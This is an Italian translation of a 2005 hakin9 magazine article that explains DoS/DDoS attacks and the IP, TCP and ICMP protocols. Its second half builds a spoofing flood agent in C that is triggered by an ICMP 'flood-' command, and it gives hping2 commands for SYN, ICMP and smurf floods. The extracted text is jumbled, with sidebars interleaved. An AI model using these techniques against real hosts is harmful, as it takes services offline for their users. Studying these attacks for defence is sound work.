Attacchi DDoS basi e aspetti pratici

Transcript

1 basi e aspetti pratici Andrzej Nowak, Tomasz Potęga Artykuł opublikowany w numerze 1/2005 magazynu hakin9. Zapraszamy do lektury całego magazynu. Wszystkie prawa zastrzeżone. Bezpłatne kopiowanie i rozpowszechnianie artykułu dozwolone pod warunkiem zachowania jego obecnej formy i treści. Magazyn hakin9, Software-Wydawnictwo, ul. Piaskowa 3, Warszawa, pl@hakin9.org

2 basi e aspetti pratici Andrzej Nowak, Tomasz Potęga La funzione dell attacco DoS (Denial of Service) è di impedire o mettere in difficoltà accesso al servizio scelto. DDoS (Distributed Denial of Service) è un DoS eseguito da più fonti contemporaneamente. Qui presentiamo le tecniche utilizzate dagli hacker per eseguire questo tipo di attacchi. Basi Gli attacchi DDoS sono utilizzati da anni sia dagli script-kiddies, sia dai crackers. Nel mondo reale un esempio di un attacco DDoS può essere l inserimento di una gomma da masticare in un buco di serratura oppure lo spegnere l interruttore della corrente ai vicini, ma di regola le conseguenze non sono gravi. Nel mondo dei computer invece le conseguenze degli attacchi DoS o DDoS possono essere molto serie: dalle interruzioni di servizi importanti alle gigantesche perdite fi nanziarie. Alcuni metodi semplici Un attacco DoS meno avanzato è packet fl ood. L'aggressore sfrutta il fatto di avere una connessione più veloce di quella del bersaglio e lo colpisce con una serie di pacchetti (per esempio echo ICMP, quindi ping) bloccando completamente la sua connessione ad Internet. Se sul computer del bersaglio funziona, per es. un server web, gli internauti avranno dei seri problemi a stabilire un collegamento con esso. Esistono anche varianti di questo tipo d attacco più avanzate, per es. bloccando un computer con frammenti di pacchetti UDP (vedi Cornice Protocollo IP frammentazione). In Windows 95 era famosa la fragilità a questo tipo di attacco e anche agli altri per i quali si utilizzano pacchetti scorrettamente costruiti. Dei buoni esempi illustranti come si può provocare la caduta di un sistema remoto sono (un Dall articolo imparerai cosa sono e come funzionano gli attacchi DDoS, come in pratica si eseguono alcuni tipi di attacchi DDoS, come funzionano i protocolli TCP/IP, UDP e ICMP, come, usando i raw socket, scrivere i programmi che spediscono i pacchetti costruiti IP. Cosa dovresti sapere per capire la prima parte dell articolo che descrive le basi di DDoS, è necessaria la conoscenza basilare nell ambito del sistema Linux e del funzionamento della rete, per capire la seconda parte dell articolo che descrive la creazione del programma che esegue un attacco, è necessaria l esperienza nella scrittura dei programmi che si servono dell interfaccia delle porte di rete. 10

3 La nascita del protocollo IP Supponiamo di avere due computer con le schede di rete connesse tramite il cavo di rete (Fig. 1). Cosa succede quando dal computer A vogliamo mandare dati al computer B (per esempio la frase uno due tre prova microfono)? Nel computer A ai dati va aggiunto qualche byte che contiene alcune informazioni rilevanti. Una di queste è il numero della scheda di rete del computer al quale indirizziamo i dati. Questa sequenza (i dati + l intestazione) la chiameremo frame. La scheda di rete del computer B, che ha ricevuto il frame, confronta l indirizzo lì contenuto (cioè il contrassegno numerico della scheda di rete) con il suo. Se gli indirizzi corrispondono, dal frame viene rimosso l intestazione e i dati vengono trasmessi al sistema operativo il quale decide cosa farne. Questo meccanismo (utilizzato per esempio dal protocollo Ethernet) permette anche di connettere più di due computer. L indirizzo di destinazione del frame viene inserito nell intestazione, arriverà a tutti i computer. Ognuno poi confronterà questo indirizzo con il proprio per capire se siano effetivamente loro i destinatari. È anche possibile connettere un maggiore numero di reti tra loro, basta utilizzare dell hardware apposito, il quale trasmetterà i frame da un cavo all altro. Il problema sorgerà quando vorremo collegare insieme delle reti che addotteranno standard diversi. Primo potrebbe verificarsi un problema di indirizzamento (le reti possono usare indirizzi in formati diversi, e quindi che l indirizzo di uno standard non potrà essere elaborato nel frame di un altro). Secondo se le reti usano il meccanismo di costruzione di frame differenti (per esempio, in uno standard l indirizzo può essere collocato all inizio dell intestazione, in un altro alla fine), l idea di trasferimento puramente meccanico del frame da un cavo all altro può risultare pessima (il computer che riceverà il frame non sarà capace di comprenderlo). Terzo le reti possono avere un limite massimo di dimensione del frame. Per risolvere questi problemi viene usato il protocollo IP (ingl. Internet Protocol) il protocollo di base utilizzato per la comunicazione tramite Internet. po vecchi e poco complicati) attacchi ping of death e teardrop. Ping of death assomiglia semplicemente al pacchetto echo ICMP, ma la sua dimensione supera i 64kB, quindi il pacchetto viene frammentato. L ultimo frammento non entra nel buffer che il sistema dedica al suo ricevimento e quindi dopo la ricezione del pacchetto il sistema si blocca oppure fa reset. Teardrop utilizza anche le imperfezioni nel meccanismo della frammentazione dei pacchetti IP. Quando la dimensione del pacchetto IP supera la grandezza maggiore sostenibile (ingl. Maximum Transfer Unit), il pacchetto viene diviso in parti nelle quali viene registrato un offset dei dati nel pacchetto originale. Se gli offset sono collocati nel modo in cui i frammenti del pacchetto si sovrappongono dopo essere riuniti, l effetto è simile a quello nel caso del ping of death. Un tipo di attacco DoS molto famoso, perché più effi cace, è quello SYN. Esso consiste nell utilizzo del limite del sistema remoto per le connessioni aperte a metà e dei limiti dell'hardware del sistema. Per capire cosa sono le connessioni aperte a metà guardiamo prima un metodo nel quale due computer stabiliscono una connessione TCP (vedi Three way handshake e Fig. 5). Il server rispedisce il pacchetto SYN+ACK all indirizzo sorgente indicato nel pacchetto SYN anche se esso è falso. Se capita su un computer funzionante, questo da parte sua può rispondere con il pacchetto RST (non avevo richiesto nessun collegamento). Gli indirizzi spoofati solitamente sono scelti in modo di stabilire quali computer non sono funzionanti o sono inesistenti. In questo caso il server deve aspettare il pacchetto ACK. Un semplice attacco di tipo SYN non ha bisogno di tanta banda, è soprattutto una minaccia alla stabilità del computer che è stato attaccato. La conseguenza della comparsa di una connessione aperta a metà è l allocazione delle risorse (per es. memoria, buffer). Se non si ha una connessione piena, queste risorse vanno sprecate. Effetti spettacolari di questi attacchi, li hanno sperimentati nel 2001 tanti portali americani, tra gli altri Yahoo, ebay, CNN ed etrade. Oggi i server possono sopportare e ricevere più connessioni aperte a metà di prima. Un attacco semplice SYN non basta per paralizzare il sistema, ma è suffi ciente che un cracker usi un numero maggiore di computer, le risorse del server attaccato siano comunque limitate. Attacchi distributed DoS Un attacco DDoS non è altro che un attacco DoS eseguito da tanti computer insieme. In quanto un attacco singolo DoS si riesce a scoprire e fermare, per un attacco DDoS non c è nessuna linea di difesa predisposta. Esso è quasi sempre incredibilmente effi cace e la sua sorgente è diffi cile da scoprire. Un esempio standard di un attacco di questo tipo è distributed packet fl ood, che consiste nell invio al computer vittima di un grande numero di pacchetti da tanti computer contemporaneamente. Anche se il sistema remoto non esaurisce le sue risorse rispondendo alle richieste può, nonostante tutto, risultare che i computer della sottorete non siano preparati a tutto questo traffi co. Fig. 1: I due computer connessi in rete scambiano il frame di Ethernet 11

4 Basi Se il sistema attaccato ha un collegamento più veloce, e gli aggressori non sono tanti, le conseguenze non saranno necessariamente serie. Se comunque abbiamo a che fare con degli attacchi su larga scala, p. es. provocati dai worm di Internet, non si può fare tanto per difendersi. Un altro esempio interessante dell attacco DDoS è smurf. Il nome proviene dal primo programma che ha utilizzato questa tecnica. Ogni sottorete IP ha il suo indirizzo di ricezione (broadcast), al quale vanno spediti i messaggi pubblici. Teoricamente al comunicato broadcast può rispondere qualsiasi macchina nell ambito di una data sottorete e quindi possono farlo tutte. Se si riesce a immettere all indirizzo broadcast un pacchetto echo ICMP (ping) con un pacchetto sorgente IP spoofato, tutte le risposte saranno indirizzate ad un solo computer. Un'altra volta abbiamo a che fare con attacchi possibili a causa di router mal confi gurati. I pacchetti inviati all indirizzo broadcast non dovrebbero essere fatti entrare dall'esterno alla rete, perché non hanno il diritto di trasmettere nessuna informazione utile. Le reti mal confi gurate quindi non fanno altro che rafforzare un attacco. Basta un computer che attacca inviando i pacchetti all indirizzo broadcast per paralizzare un router oppure un sistema remoto. Un attacco smurf è comunque facile da fermare. Esso utilizza il Fig. 2: Protocollo IP indirizzamento Protocollo IP indirizzamento Per risolvere il problema di indirizzamento, accennato in La nascita del protocollo IP, ogni computer che utilizza il protocollo IP ha un indirizzo non correlato con il numero fisico della scheda di rete per esempio Questo indirizzo (insieme con diverse informazioni utili) va situato all inizio dei dati che devono essere trasmessi come intestazione IP. La porzione dei dati contenenti l intestazione IP, la chiamiamo pacchetto IP. Se utilizziamo Ethernet questo pacchetto va inserito nel frame ethernet (aggiungiamo cioè al suo inizio un'intestazione che conterrà, tra l altro, l indirizzo fisico della scheda di rete del computer al quale inviamo i dati), dopodiché lo trasmettiamo in rete. In questo modo i dati verranno accompagnati da due intestazioni l intestazione IP e l intestazione Ethernet. Per trasmettere dati tra due computer che si trovano in reti diversee che utilizzano standard diversi (sulla Fig. le macchine 1 e 5) dobbiamo utilizzare la macchina che è connessa a tutte e due le reti (7). Nei dati inseriamo il pacchetto IP che va immesso nel frame della prima rete. Inviamo il frame alla macchina 7 la quale dopo averlo ricevuto estrae il pacchetto IP. Dopo aver decifrato l indirizzo IP il computer 7 sa che il pacchetto è stato indirizzato al computer 5, quindi lo trasmette in un frame della seconda rete e lo spedisce al computer 5. protocollo ICMP il quale si può bloccare sul router, ma è stato creato un variante dell attacco smurf chiamato fraggle che si basa sui pacchetti UDP echo. L utilizzo del protocollo UDP dà maggiori possibilità di successo all aggressione, perché questo protocollo viene utilizzato da tante applicazioni e spesso non può essere bloccato. La caduta di massa I rappresentanti classici degli strumenti della caduta di massa in Internet sono i worm. Mentre durante gli anni il principale obiettivo era quello di diffondersi rapidamente e l effetto DoS era solo un effetto collaterale, negli ultimi tempi invece sono comparsi dei programmi che hanno come scopo quello di eseguire un attacco DDoS. Ricordiamo i casi più famosi: Protocollo IP frammentazione Per risolvere, già accennato in La nascita del protocollo IP, il problema di invio dati tra le reti con una differente dimensione del frame, si fa uso della frammentazione dei pacchetti IP. Quando un pacchetto IP di grande dimensione deve essere spedito ad una rete che non permette i frame così grandi, questo viene suddiviso in due pacchetti più piccoli. Per permettere al computer destinatario di mettere tutte e due le parti in un insieme, ogni pacchetto IP è fornito di un identificatore nell intestazione (da 1 a 65536), un informazione sulla continuità del pacchetto (cioè se il destinatario si dovrà aspettare la ricezione di altri frammenti) e un'informazione sulla posizione originaria (prima della frammentazione) del frammento nel pacchetto. Dopo la frammentazione del pacchetto in due pezzi più piccoli, tutti e due avranno lo stesso valore nel campo IPID (identificatore). Il primo di essi conterrà una flag more fragments (informa che seguirà la seconda parte del pacchetto), il secondo un campo offset che includerà il come è stata effettuata la frammentazione e la sua fine. 12

5 La composizione dell intestazione IP La composizione del pacchetto IP è presentata nella Fig. 3. Questo schema va letto da sinistra a destra e dall alto verso il basso. Esempio: ogni pacchetto è composto da 4 bit (sulla Fig. è 0 3 bit), che indicano la versione del protocollo IP seguiti da i quattro bit che indicano la lunghezza del pacchetto etc. Il pacchetto IP contiene tutte le informazioni necessarie alla consegna del datagramma (del pacchetto). Affinché il pacchetto sia accettato correttamente deve contenere i dati giusti e corrispondere alla dimensione riportata nell intestazione essa non riguarda i dati contenuti nel pacchetto. Il campo lunghezza dell intestazione indica il numero dei caratteri di 32 bit nell intestazione, lunghezza totale signifi ca la lunghezza totale del datagramma in byte. Il campo protocollo... fornisce le informazioni sul protocollo d alto livello e consente al destinatario di leggere il pacchetto. Il campo versione indica la versione del protocollo IP (di solito 4 o 6). La somma di controllo Per calcolare la somma di controllo del pacchetto è necessario un accumulatore di 32 bit, nel quale facciamo la somma delle seguenti parole di 16 bit. Quando otteniamo un valore che supera il limite dei 16 bit, al risultato finale dei 16 bit aggiungiamo i contenuti maggiori dei 16 bit dell accumulatore. Se ancora una volta ci troviamo con una eccedenza, lo aggiungiamo alla somma che sottoporremo alla sottrazione e quindi otterremo la somma di controllo finale. Code Red si avvaleva della mancanza di una patch all interno di Microsoft IIS; gli effetti collaterali del suo agire (la scansione degli indirizzi nella ricerca di altri bersagli) furono consistenti Fig. 3: La composizione del pacchetto IP Fig. 4: Attacco di tipo smurf disturbi nel lavoro della rete mondiale. Nimda diffuso in più di un modo; come un fi le virus di cartella tradizionale, tramite gli allegati di posta, sfruttando la mancanza di una patch in IIS e anche tramite portamento del contenuto errato delle pagine web. Gli effetti del suo funzionamento furono grandi disturbi nell utilizzo e nel funzionamento di Internet. Blaster si diffondeva usando il buco nel sottosistema RPC dei sistemi Windows basati sul kernel NT; ha provocato danni notevoli, Spoofing Ogni pacchetto IP contiene nell'intestazione l indirizzo del computer mittente. Teoricamente questo indirizzo dovrebbe indicare il computer dal quale proviene il pacchetto. In pratica è anche possibile cambiare questo indirizzo con uno completamente diverso e il pacchetto, nonostante tutto, sarà spedito al destinatario. Questo avviene per colpa o per una errata confi gurazione dei router i quali non dovrebbero trasmettere pacchetti che provengono dalle reti estranee. Lo spoofing provoca delle diffi coltà per risalire al vero mittente del pacchetto. ma non un traffi co critico aggiuntivo nella rete. Il suo compito principale era di eseguire un attacco DDoS di tipo SYN verso la pagina web windowsupdate.com. MyDoom si diffondeva usando gli allegati della posta e del sistema P2P Kazaa. Il 1 febbraio 2004 ha iniziato con successo un attacco alla pagina (semplice HTTP GET). Da dove arrivano gli zombie? Per un attacco di successo DDoS c è bisogno di tante macchine che attaccano contemporaneamente. In che modo un aggressore costringe un grande numero di computer ad eseguire un comando? Ci sono due metodi: la conquista del controllo totale del computer, sfruttando di una falla nel sistema di sicurezza (come per esempio Blaster) oppure utilizzando uno specifico comportamento messo a disposizione da un sistema o da un protocollo dati (per esempio smurf). 13

6 Fig. 5: La composizione del pacchetto IP e TCP (semplifi cato) Fig. 6: La composizione del pacchetto TCP Three way handshake Il protocollo IP non dispone di metodi che permettono di assicurarsi che il pacchetto spedito sia realmente arrivato al destinatario. Se vogliamo avere questa sicurezza dobbiamo usufruire del protocollo TCP. TCP permette di ampliare le possibilità del protocollo IP. All interno dei pacchetti IP vanno messi i pacchetti con intestazione TCP (vedi Fig. 5 parte destra). Ognuno di questi pacchetti è composto da un pacchetto dati e da un intestazione contenente le informazioni necessarie sui dati che vanno inviati. Quando computer A spedisce al computer B un pacchetto di dati, questo gli può rispondere: OK, confermo la ricezione del pacchetto con numero di sequenza La stabilizzazione della connessione TCP tra i due computer comincia con accordo sul valore iniziale del numero di sequenza: A trasmette a B un pacchetto con l'informazione sul valore iniziale dal quale comincerà a numerare i suoi pacchetti (pacchetto SYN), B risponde con un pacchetto nel quale conferma la ricezione del pacchetto ricevuto (pacchetto ACK), B invia ad A un pacchetto con l informazione sul valore iniziale dal quale comincerà a numerare i suoi pacchetti (pacchetto SYN), A risponde con un pacchetto nel quale conferma la ricezione del pacchetto ricevuto (pacchetto ACK). I punti 2 e 3 possono anche avvenire contemporaneamente B può in un pacchetto confermare la ricezione del pacchetto ricevuto da A (ACK) e consegnare il suo numero iniziale di sequenza (SYN) inviando un pacchetto segnato di solito come SYN+ACK. La procedura di connessione è composta quindi da tre passi (vedi Fig. 7): Basi A invia a B un pacchetto SYN, B risponde con SYN+ACK, A risponde con pacchetto ACK. Fig. 7: Three way handshake nella versione giusta e sbagliata Questa procedura è chiamata Three way handshake (triplo scambio di mano). Per i particolari vedere le RFC 791 e RFC

7 Protocollo ICMP Internet Control Message Protocol è un altro (accanto a TCP) protocollo di rete che funziona ad un livello superiore all'ip. I pacchetti ICMP servono per verifi care se un dato computer è raggiungibile, per informare sui problemi di comunicazione ecc. I più diffusi sono due tipi di pacchetti ICMP: ICMP echo request e ICMP echo reply. Quando spediremo ad un indirizzo un pacchetto ICMP echo request il destinatario dovrebbe (non è obbligato) rispondere con un pacchetto ICMP echo reply. In questo modo (per esempio utilizzando lo strumento ping) possiamo controllare se un computer è raggiungibile. La composizione del pacchetto ICMP è mostrata nella Fig. 8. Sono stati scritti molti programmi i quali trasformano i personal computer in schiavi eseguenti ogni comando dell aggressore. I più famosi fi nora sono Trinoo, Tribe Flood Network, Stecheldracht, Shaft e TFN2000. Anche se questi software sono facili da scoprire con molti programmi antivirus, vengono comunque utilizzati e sono organizzati in rete gerarchica aspettando istruzioni su una porta specifi ca o nel canale della rete IRC. La maggior parte delle reti zombie il cui scopo principale era di eseguire un attacco DDoS venivano installate manualmente. Oggi questa mansione, l hanno acquisita i worm. Blaster ha infettato 600 mila computer circa, nel caso di MyDoom si parlava di un milione di zombie. Vale anche la pena di accennare che esiste un fenomeno simile ad un Protocollo UDP User Datagram Protocol, è simile a TCP o ICMP, funziona ad un livello superiore all'ip. Proprio come il protocollo TCP permette di stabilire la porta alla quale inviare i dati, ma è molto più semplice. UDP è un protocollo senza collegamento i pacchetti inviati possono non arrivare all obiettivo oppure arrivare in una sequenza diversa dalla quale sono stati inviati (in UDP non si conferma la ricezione dei dati). Fig. 8: La composizione del pacchetto ICMP attacco, anche se nonostante tutto, esso conduce ad una risposta negativa nell accesso ai servizi parliamo di slashdotting. Quando un famoso servizio di Internet mette un link a qualche pagina nella rete, la grande massa dei lettori non vede ora di vederla. Di solito la pagina non è molto conosciuta e l amministratore del server sul quale essa si trova non si aspetta una situazione di crisi. Nel momento dell improvvisa crescita della popolarità il sistema non è capace di servire tutte le richieste e rifi uta l accesso al servizio (HTTP) nonostante gli utenti non siano dei malintenzionati. Il nome di questo effetto deriva da un servizio americano Slashsdot ( il quale offre tanti link. Eseguire un attacco DDoS Proviamo ad eseguire un attacco DoS e qualche attacco DDoS in ambiente domestico. Ci serve una rete LAN e qualche computer. Per monitorare gli effetti dell attacco possiamo utilizzare strumenti quali iptraf, tcdump o ethereal. Per riprodurre in pratica gli argomenti che stiamo discutendo scriveremo un semplice programma dimostrativo. Le sue copie saranno installate sui computer dai quali partirà l attacco. Il segnale che consentirà al programma di iniziare l'attacco sarà la ricezione del pacchetto preparato. Come risposta il programma inizierà l invio dei pacchetti ICMP (con lo scopo di eseguire un attacco ICMP fl ood) oppure dei pacchetti SYN (attacco SYN fl ood). Quale tipo di pacchetti saranno inviati dipende dal nome utilizzato per avviare il programma. Dopo aver compilato il programma dovremo copiare la cartella eseguibile sotto i due nomi (syn_fl ood e icmp_fl ood) oppure creare due collegamenti simbolici conducenti alla cartella. Gli indirizzi sorgenti saranno estratti a caso utilizzeremo lo spoofi ng. Guardiamo ora l'algoritmo del funzionamento del programma synipmc.c presentato nella Fig. 9. Il programma comincerà a funzionare dal momento della verifi ca del nome utilizzato per avviarlo. Successivamente entrerà in standby, modalità dalla quale ascolterà i pacchetti in arrivo. Se troverà un pacchetto che conterrà il fl ood_indirizzo_ip, sarà richiamata la funzione corrispondente di quel tipo e l invierà all indirizzo_ip. Scriviamo programma Siccome il sistema operativo si occupa di servizi TCP/IP, la maggior parte dei programmi non intervengono nei titoli dei dati inviati e ricevuti. Se vogliamo, ad esempio cambiare l indirizzo del mittente, dobbiamo da soli costruire tutto il pacchetto insieme al titolo. Preparato in questo modo il pacchetto occorre ora spedirlo. Per fortuna il sistema oltre ai protocolli normali come PF _ INET, UDP o TCP, offre anche i raw socket. Utilizzando questo tipo di protocollo l utente è obbligato alla costruzione e all analisi dei pacchetti. Bisogna sottolineare che non tutti i sistemi operativi permettono di creare un protocollo aperto, i sistemi MS Windows sono limitati da questo punto di vista, quindi realizzeremo il nostro esempio utilizzando Linux. Prima di cominciare il lavoro suggeriamo ai lettori meno abili di approfondire la tecnica generale di programmazione delle porte. Socket e pacchetto IP Per creare un raw socket, come argomento alla funzione socket() mettiamo SOCK _ RAW. Il campo del 15

8 Fig. 9: Lo strumento per eseguire un attacco DDoS Basi protocollo può prendere il numero identifi cativo da uno qualsiasi dei protocolli IP. Può anche prendere il valore IPPROTO _ RAW il socket non è in questo caso abbinato ad un protocollo concreto e praticamente si può confi gurare liberamente in tutti i campi dell intestazione IP. Alcuni di essi (la lunghezza, la somma di controllo) sono comunque composti dal kernel, altri come per esempio indirizzo sorgente soltanto quando sono azzerati. A parte alcune eccezioni, il sistema non cambia il contenuto, né dell intestazione, e nemmeno i dati trasmessi dentro un pacchetto. Quindi la creazione del socket può essere rappresentata così: int sock=socket(pf_inet, SOCK_RAW, IPPROTO_RAW); In questo momento si può anche usare sendto() per inviare i dati: sendto(sock, pacchetto, dimensione del pacchetto,...); I protocolli IPPROTO _ RAW non possono essere utilizzati per ricevere dei dati in questo caso bisogna stabilire un concreto protocollo IP (come ICMP), oppure usare i socket PF _ PACKET. Per spedire il pacchetto dobbiamo prima costruirlo. In questo caso vale la pena utilizzare i file di apertura dalla sottocartella netinet tra questi troviamo ip.h, ip_icmp.h e tcp.h. Contengono le definizioni delle strutture corrispettive alle intestazioni dei protocolli corrispondenti. In questo modo invece di utilizzare spostamenti diretti possiamo servirci dei nomi simbolici molto più facili da leggere. Volendo configurare il campo Time To Live, cambiamo il nono byte del pacchetto IP: packet[8]=64; Non c è comunque bisogno di cercare dei valori offset, essi sono nascosti nel struct iphdr. ip_header->ttl=64; Cominciamo allora la creazione dell intestazione IP. Abbiamo bisogno di un buffer che conserverà il pacchetto e l indicazione del suo inizio: char packet[dimensione]; struct iphdr *ip_header =(struct iphdr *) packet; Ora vogliamo spedire un pacchetto standard della versione 4, attualmente la più popolare, del protocollo IP (IPv4): ip_header->version=4; con la lunghezza minima di 20 byte quindi di cinque parole da 32 bit: 16

9 ip_header->ihl=5; Dobbiamo necessariamente dare un valore al campo TTL, per permettere al pacchetto di fare un lungo viaggio in Internet: ip_header->ttl=64; Rimane quindi da confi gurare gli indirizzi sorgente e di destinazione: ip_header->saddr = sorgente ip_header->daddr = bersaglio Gli indirizzi IP qui vengono trattati come i numeri da 32 bit senza segno (corrispondenti al tipo u _ int32 _ t). Come abbiamo già accennato quando lasceremo il sorgente azzerato, il sistema metterà in questo posto il vero IP del mittente. Ora basta che il pacchetto sia trasmesso e al resto ci penserà il kernel. La tappa successiva dovrà essere la realizzazione dell'intestazione del protocollo di livello superiore. Pacchetto ICMP Cominciamo dalla richiesta ICMP echo request. Essa è utilizzata dal programma ping il sistema funzionante dovrebbe rispedire il pacchetto echo reply all indirizzo del mittente. Ricordiamo che l indirizzo sarà falso: l effetto sarà un sovraccarico aggiuntivo del computer attaccato. Confi guriamo l indicatore dell intestazione ICMP, sappiamo già che si trova subito dopo l intestazione IP: struct icmphdr *icmp_header =(struct icmphdr *) (packet + sizeof(struct iphdr)); Compiliamo il campo del tipo, grazie ai numeri fi ssi da ip_icmp.h non dobbiamo nemmeno sapere che la richiesta ha il numero 8. icmp_header->type=icmp_echo; Successivamente si presenterà un problema: la somma di controllo ICMP. Possiamo contarla similmente al suo corrispondente nell intestazione IP, ma possiamo farcela senza calcoli aggiuntivi. Vogliamo inviare un pacchetto, il più semplice possibile, composto soltanto dal campo tipo. Quindi possiamo supporre che il valore di questa somma di controllo sarà la semplice negazione ICMP _ ECHO: icmp_header->checksum=~icmp_echo; In questo momento abbiamo a disposizione un pacchetto corretto ICMP pronto da spedire. Pacchetto TCP È arrivato il momento di occuparci di un altro elemento il pacchetto TCP con la confi gurazione SYN. Cominciamo come sempre da un indicatore per l intestazione. Anche in questo caso lo troveremo subito dopo l intestazione IP: struct tcphdr *tcp_header =(struct tcphdr *) (packet + sizeof(struct iphdr)); Dobbiamo decidere il protocollo concreto della porta TCP, anzi, due porte: sorgente e di destinazione. Essa dovrebbe essere aperta sul computer che vogliamo attaccare, ma vogliamo far fi nta di stabilire la connessione normale, quindi in tutti e due i casi può essere utilizzata la stessa porta. Il richiamo della funzione htons() ci assicurerà l'adeguata successione dei byte al numero di porta di 16 bit: tcp_header->dest = tcp_header->source = htons(numer); La fl ag SYN deve essere attiva: tcp_header->syn=1; Il campo data offset è un calcolo camuffato della lunghezza del titolo ancora una volta 20 byte (5 parole): tcp_header->doff=5; Un ultima tappa sarà il calcolo della somma di controllo. Dobbiamo collocarla nel tcp _ header->check questo campo è stato chiamato diversamente che nel ICMP. Possiamo cominciare ad effettuare l attacco altri elementi rimanenti dell intestazione, li possiamo lasciare azzerati. Controllo remoto Sappiamo già come creare i pacchetti che vanno usati per l'attacco. È ora di preparare il meccanismo di controllo. Per la comunicazione saranno utilizzati i pacchetti ICMP. Li riceveremo tramite i protocolli aperti, ma questa volta confi gurando il protocollo: int listen_sock = socket(pf_inet, SOCK_RAW, IPPROTO_ICMP); Ora possiamo ricevere in standby i pacchetti ICMP in arrivo: int len=read(listen_sock, buffor, dimensione); L istruzione dell attacco sarà la sequenza inserita all interno dei dati: flood-a.b.c.d La presenza della parola fl ood all inizio dei dati ICMP rappresenta il comando di decodificazione dell indirizzo IP che si trova dopo il trattino (-) e l inizio dell attacco. Il più breve indirizzo IP scritto in questo modo occupa 7 byte, il più lungo 15. Aggiungendo a questo la dimensione delle intestazioni (di solito saranno 20 byte dell intestazione IP e 8 byte dell intestazione ICMP) otterremo il primo criterio secondo il quale possiamo decifrare i dati ICMP in arrivo. Se la dimensione sarà giusta, possiamo cercare il fl ood, dopo di che possiamo aspettarci l indirizzo. Per la sua conversione è molto utile la funzione standard inet _ aton(). Il campo s _ addr della struttura in _ addr, che permetterà a questa funzione di restituire gli esiti non è altro che l indirizzo IP della vittima pronto per essere inserito nell'intestazione: struct in_addr addr; inet_aton( , &addr);... flood(..., addr.s_addr,...); 17

10 # telnet indirizzo.bersaglio 6000 Trying indirizzo.bersaglio... telnet: connect to address indirizzo.bersaglio: Connection timed out Fig. 10: Attacco SYN Per inviare un comando del genere basta un semplice programma ping che sarà capace di aggiungere i dati al pacchetto. In questo modo però ci saranno dei limiti connessi: i dati possono avere il massimo di 16 bytes, ma bisogna darli in forma esadecimale. Possiamo comunque utilizzare il programma hping2 (funziona per qualsiasi pacchetto TCP/IP). Tra le tante opzioni che esso offre c è anche un metodo per collocare i dati nel pacchetto ICMP. Per questo serve il comando --sign catena (abbreviazione -e): # hping2 --icmp --count 1 --sign \ flood-indirizzo.bersaglio \ indirizzo.agente Realizziamo un attacco Per eseguire un attacco SYN occorre scrivere un programma più complicato: # gcc -o syn synicmp.c e successivamente farlo funzionare su ogni computer remoto. Servendosi del commando hping2 inviamo le informazioni sul bersaglio. Gli effetti sotto forma di connessioni rifi utate si vedono nel log dmesg sul computer della vittima (vedi Fig. 11). Proviamo a collegarci con la porta attaccata riceveremo un accesso negato. Per monitorare gli effetti dell attacco si possono utilizzare gli strumenti iptraf (per ICMP fl ood, smurf) e ethereal (per SYN), bisogna comunque ricordarsi che durante l attacco SYN ethereal smetterà di rispondere ai comandi perché sarà occupato a raccogliere i dati sulle connessioni. L effetto dell attacco SYN nel programma ethereal è rappresentato nella Fig. 10. Per quanto SYN fl ood da un collegamento di 128 bit non provocava il blocco del sistema durante i test, ma solo il rifi uto dell accesso al servizio, sorgenti con i collegamenti di 128 bit hanno provocato la scomparsa di qualsiasi segno di vita da parte del sistema stesso. Attacco ICMP Per realizzare un attacco ICMP bisognerebbe complicare il programma nel seguente modo: # gcc -o icmp synicmp.c Per iniziare l'attacco inviamo il pacchetto ICMP adeguatamente formulato utilizzando lo strumento hping2. Se vogliamo attivare insieme tutti gli zombie contemporaneamente in tutta la sottorete, inviamo il pacchetto ICMP non ad un solo indirizzo, ma al broadcast. # hping2 - icmp - count 1 - sign \ flood-indirizzo.bersaglio \ indirizzo.broadcast Basi Fig. 11: L effetto dell attacco SYN Sia gli attacchi ICMP realizzati utilizzando il nostro strumento, sia quelli di tipo smurf utilizzando hping2 (dai computer con le connessioni veloci) provocavano soltanto un aumento di carico del computer della vittima, un notevole calo della qualità di trasmissione e il rallentamento del 30 40% della connessione di 10Mbit. L attacco smurf differenzia poco da quello descritto sopra. Esso esige comunque una banda più larga del- 18

11 l aggressore perché invia una marea di pacchetti agli indirizzi broadcast delle diverse reti. Questa azione è facile da eseguire usando nuovamente hping2. # hping2 -icmp -i 1u \ -a indirizzo.bersaglio \ indirizzo.sottorete.di supporto Il parametro -i 1u ordina l invio dei pacchetti ogni microsecondo, l opzione -a indirizzo.bersaglio invece configura l indirizzo sorgente dei pacchetti all indirizzo della vittima in questo modo le arrivano risposte dalla rete di supporto. Come prima, sono necessari i privilegi dell utente root perché ad un utente qualsiasi non è permesso di cambiare le intestazioni. La chiave degli attacchi di tipo smurf è il trovare il supporto delle reti. Qualche anno fa esistevano più reti aperte e la ricerca di trasmettitori durava relativamente poco. Oggi bisogna sforzarsi di più per trovare un gruppo adeguato di computer. Può esserci d aiuto in questo caso la lettura del sito sul quale si trovano indirizzi dei più grandi amplificatori smurf in Internet. Gli effetti, similmente come nel caso dell attacco ICMP, si possono osservare utilizzando iptraf (il numero dei pacchetti ICMP drasticamente vasto). In rete Il tempo di risposta ai ping semplici dovrebbe aumentare a causa del sovraccarico della banda (collegamento) e del processore o, nei casi più estremi, la risposta potrebbe non arrivare mai. Il metodo alternativo I pacchetti presentati si possono generare utilizzando anche il programma sendip, che va avviato dalla linea di comando. In questo caso non c è bisogno di scrivere il programma vero e proprio, ma esistono molti lati negativi: sendip crea un solo pacchetto, bisogna dargli un indirizzo spoofato e non c è la possibilità di controllo remoto. Troveremo i pacchetti RPM ed i sorgenti sendip all indirizzo http: // sendip.html. Il formato completo dell avvio del programma è: # sendip [parametri del modulo] \ indirizzo_host Sendip dà la possibilità di costruire diversi tipi dei pacchetti di dati, anche TCP/IP o ICMP. Ad ogni protocollo corrisponde un frammento di codice caricato separatamente il modulo. Facciamo la scelta utilizzando l opzione -p. I nomi dei moduli protocollo UDP, protocollo IP, protocollo ICMP, protocollo TCP, un piccolo compendium riguardante TCP, IP e UDP, le posizioni Cisco riguardanti la difesa dagli attacchi SYN, un articolo sul tema della preparazione TCP/IP alla difesa dagli attacchi SYN, l autore Mariusz Burdach, una guida abbastanza competente sul tema DDoS. Un archivio delle descrizioni interessanti delle tecniche precedenti e degli strumenti DDoS: un compendium della conoscenza sul tema DDoS dell anno corrispondono ai nomi dei protocolli. Ricordiamoci che TCP ed IP sono due protocolli separati. Per spedire il traffi co TCP, bisogna caricare prima il modulo IP (-p ipv4... -p tcp). I parametri dei protocolli concreti vanno inseriti tramite chiavi aggiuntive. I più importanti (dal nostro punto di 